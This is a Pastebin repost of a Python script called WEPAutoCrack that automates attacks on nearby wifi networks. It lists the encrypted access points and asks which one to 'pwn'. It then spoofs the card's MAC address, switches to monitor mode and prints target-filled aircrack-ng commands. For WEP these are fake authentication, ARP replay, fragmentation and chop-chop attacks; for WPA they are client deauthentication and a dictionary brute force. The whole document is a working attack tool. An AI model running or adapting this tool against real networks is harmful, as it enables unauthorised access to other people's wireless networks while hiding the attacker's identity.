Advertisement
InfinityExistz

WEPAutoCrack - ZeroSecurity.org

Feb 5th, 2012
184
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.00 KB | None
  1. #!/usr/bin/env python
  2.  
  3. #
  4. # Copyright 2011 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
  5. #
  6. #
  7. # --------- WEPAutoCrack ----------
  8. # by zx2c4
  9. # ---------------------------------
  10. #
  11. # This utility terminates disruptive daemons, scans for networks,
  12. # places your wifi card into monitor mode, switches to the right channel,
  13. # fakes a random MAC address, and builds a "choose your own adventure"
  14. # instruction sequence for the particular access point you choose to
  15. # crack, for use with aircrack-ng for cracking WEP passwords, and finally
  16. # resets your daemons once you've found a password.
  17. #
  18. # Be sure to look at the pwn() function. There are /etc/init.d/ commands in
  19. # there to shutdown and startup your system's networking services. Here you
  20. # will find how I have my gentoo box setup, but you'll likely need to
  21. # change it to suit your own needs. It should be trivial -- stopping and
  22. # starting NetworkManager, if you use that, or whatever your situation
  23. # is. There are two "CHANGE ME" blocks below. Find them. Edit them.
  24. #
  25. # greetz to gohu for iwlist parsing code at
  26. # https://bbs.archlinux.org/viewtopic.php?pid=737357
  27. #
  28.  
  29. import sys
  30. import subprocess
  31. import os
  32.  
  33. def pwn(interface, network):
  34. print "[+] Shutting down services"
  35.  
  36. # BEGIN CHANGE ME
  37. os.system("systemctl stop wpa_supplicant@wlan0.service")
  38. os.system("systemctl stop dhcpcd.service")
  39. os.system("systemctl stop avahi-daemon.service")
  40. # END CHANGE ME
  41.  
  42. print "[+] Acquiring MAC address:",
  43. f = open("/sys/class/net/%s/address" % interface, "r")
  44. realMac = f.read().strip().upper()
  45. f.close()
  46. print realMac
  47.  
  48. print "[+] Setting fake MAC address"
  49. os.system("ifconfig %s down" % interface)
  50. os.system("macchanger -r %s" % interface)
  51. f = open("/sys/class/net/%s/address" % interface, "r")
  52. mac = f.read().strip().upper()
  53. f.close()
  54.  
  55. print "[+] Setting wireless card to channel %s" % network["Channel"]
  56. os.system("iwconfig %s mode managed" % interface)
  57. os.system("ifconfig %s up" % interface)
  58. os.system("iwconfig %s channel %s" % (interface, network["Channel"]))
  59. os.system("ifconfig %s down" % interface)
  60. os.system("iwconfig %s mode monitor" % interface)
  61. os.system("ifconfig %s up" % interface)
  62. os.system("iwconfig %s" % interface)
  63.  
  64. if network["Encryption"].startswith("WEP"):
  65. instructions = """
  66. === Capture IVs ==
  67. airodump-ng -c CHANNEL --bssid BSSID -w output INTERFACE
  68.  
  69. == Get Deauthetication Packets (Fake Authentication) ==
  70. aireplay-ng -1 0 -e 'NAME' -a BSSID -h MAC INTERFACE
  71. OR
  72. aireplay-ng -1 6000 -o 1 -q 10 -e 'NAME' -a BSSID -h MAC INTERFACE
  73. * the latter is good for persnikitty stations
  74.  
  75. == Request ARP Packets ==
  76. aireplay-ng -3 -b BSSID -h MAC INTERFACE
  77. * if successful, skip the next three steps and move to analyze
  78.  
  79. == Fragmentation Attack (if requesting ARPs didn't work - no users on network) ==
  80. aireplay-ng -5 -b BSSID -h MAC INTERFACE
  81. * use this packet? yes
  82. * if successful, skip the next step and construct an arp packet
  83.  
  84. == Chop-Chop Attach (if fragmentation fails) ==
  85. aireplay-ng -4 -b BSSID -h MAC INTERFACE
  86. * use this packet? yes
  87.  
  88. == Construct ARP Packet ==
  89. packetforge-ng -0 -a BSSID -h MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-request
  90. * k source, l destination - change for persnikittiness
  91.  
  92. = Inject Constructed ARP (if fragmentation or chop-chop) ==
  93. aireplay-ng -2 -r arp-request INTERFACE
  94. * use this packet? yes
  95.  
  96. == Analyze ==
  97. aircrack-ng -z -b BSSID output*.cap
  98. """
  99. elif network["Encryption"].startswith("WPA"):
  100. instructions = """
  101. == Collect 4-way Authentication Handshake ==
  102. airodump-ng -c CHANNEL --bssid BSSID -w psk INTERFACE
  103.  
  104. == Deauthenticate Wireless Client ==
  105. aireplay-ng -0 1 -a BSSID -c CLIENT wlan0
  106.  
  107. == Brute Force ==
  108. cat /usr/share/dict/* | aircrack-ng -w - -b BSSID psk*.cap
  109. """
  110. else:
  111. instructions = "Wrong encryption type"
  112.  
  113. instructions = instructions.replace("NAME", network["Name"]).replace("BSSID", network["Address"]).replace("MAC", mac).replace("INTERFACE", interface).replace("CHANNEL", network["Channel"])
  114. proc = subprocess.Popen("less", stdin=subprocess.PIPE)
  115. proc.communicate(input=instructions)
  116. proc.wait()
  117.  
  118. print "[+] Restoring wifi card"
  119. os.system("ifconfig %s down" % interface)
  120. os.system("macchanger -m %s %s" % (realMac, interface))
  121. os.system("iwconfig %s mode managed" % interface)
  122. os.system("ifconfig %s up" % interface)
  123.  
  124. print "[+] Starting stopped services"
  125. # BEGIN CHANGE ME
  126. os.system("systemctl start wpa_supplicant@wlan0.service")
  127. os.system("systemctl start dhcpcd.service")
  128. os.system("systemctl start avahi-daemon.service")
  129. # END CHANGE ME
  130.  
  131. def get_name(cell):
  132. return matching_line(cell, "ESSID:")[1:-1]
  133.  
  134. def get_quality(cell):
  135. quality = matching_line(cell, "Quality=").split()[0].split('/')
  136. return str(int(round(float(quality[0]) / float(quality[1]) * 100))).rjust(3) + " %"
  137.  
  138. def get_channel(cell):
  139. return matching_line(cell, "Channel:")
  140.  
  141. def get_encryption(cell):
  142. enc = ""
  143. if matching_line(cell, "Encryption key:") == "off":
  144. enc = "Open"
  145. else:
  146. for line in cell:
  147. matching = match(line, "IE:")
  148. if matching != None:
  149. wpa = match(matching, "WPA")
  150. if wpa != None:
  151. enc = "WPA"
  152. else:
  153. wpa = match(matching, "IEEE 802.11i/WPA2")
  154. if wpa != None:
  155. enc = "WPA2"
  156. if enc == "":
  157. enc = "WEP"
  158. return enc
  159.  
  160. def get_address(cell):
  161. return matching_line(cell, "Address: ")
  162.  
  163. rules = {"Name":get_name,
  164. "Quality": get_quality,
  165. "Channel": get_channel,
  166. "Encryption": get_encryption,
  167. "Address": get_address
  168. }
  169.  
  170. def sort_cells(cells):
  171. sortby = "Quality"
  172. reverse = True
  173. cells.sort(None, lambda el: el[sortby], reverse)
  174.  
  175. columns = ["#", "Name", "Address", "Quality", "Channel", "Encryption"]
  176.  
  177. def matching_line(lines, keyword):
  178. for line in lines:
  179. matching = match(line,keyword)
  180. if matching != None:
  181. return matching
  182. return None
  183.  
  184. def match(line,keyword):
  185. line = line.lstrip()
  186. length = len(keyword)
  187. if line[:length] == keyword:
  188. return line[length:]
  189. else:
  190. return None
  191.  
  192. def parse_cell(cell):
  193. parsed_cell = {}
  194. for key in rules:
  195. rule = rules[key]
  196. parsed_cell.update({ key: rule(cell) })
  197. return parsed_cell
  198.  
  199. def print_table(table):
  200. widths=map(max, map(lambda l:map(len, l), zip(*table)))
  201.  
  202. justified_table = []
  203. for line in table:
  204. justified_line = []
  205. for i, el in enumerate(line):
  206. justified_line.append(el.ljust(widths[i] + 2))
  207. justified_table.append(justified_line)
  208.  
  209. for line in justified_table:
  210. for el in line:
  211. print el,
  212. print
  213.  
  214. def print_cells(cells):
  215. table = [columns]
  216. counter = 1
  217. for cell in cells:
  218. cell_properties=[]
  219. for column in columns:
  220. if column == '#':
  221. cell_properties.append(str(counter))
  222. else:
  223. cell_properties.append(cell[column])
  224. table.append(cell_properties)
  225. counter += 1
  226. print_table(table)
  227.  
  228. def main():
  229. print "+------------------------+"
  230. print "+ +"
  231. print "+ WEPAutoCrack +"
  232. print "+ by zx2c4 +"
  233. print "+ +"
  234. print "+------------------------+"
  235. print
  236. if len(sys.argv) != 2:
  237. print "You must supply the wifi card name as an argument."
  238. return
  239. if os.getuid() != 0:
  240. print "You must be root."
  241. return
  242.  
  243. print "[+] Scanning..."
  244. proc = subprocess.Popen(["iwlist", sys.argv[1], "scanning"], stdout=subprocess.PIPE)
  245. cells=[[]]
  246. parsed_cells=[]
  247. for line in proc.stdout:
  248. cell_line = match(line, "Cell ")
  249. if cell_line != None:
  250. cells.append([])
  251. line = cell_line[-27:]
  252. cells[-1].append(line.rstrip())
  253. cells = cells[1:]
  254. for cell in cells:
  255. parsed_cells.append(parse_cell(cell))
  256. sort_cells(parsed_cells)
  257. encrypted_cells = []
  258. for cell in parsed_cells:
  259. if cell["Encryption"] != "Open":
  260. encrypted_cells.append(cell)
  261.  
  262. print_cells(encrypted_cells)
  263. print
  264. try:
  265. network = int(raw_input("Which network would you like to pwn? [1-%s] " % len(encrypted_cells)))
  266. except:
  267. network = -1
  268.  
  269. if network > len(encrypted_cells) or network < 1:
  270. return
  271.  
  272. pwn(sys.argv[1], encrypted_cells[network - 1])
  273.  
  274. main()
Advertisement
RAW Paste Data Copied
Advertisement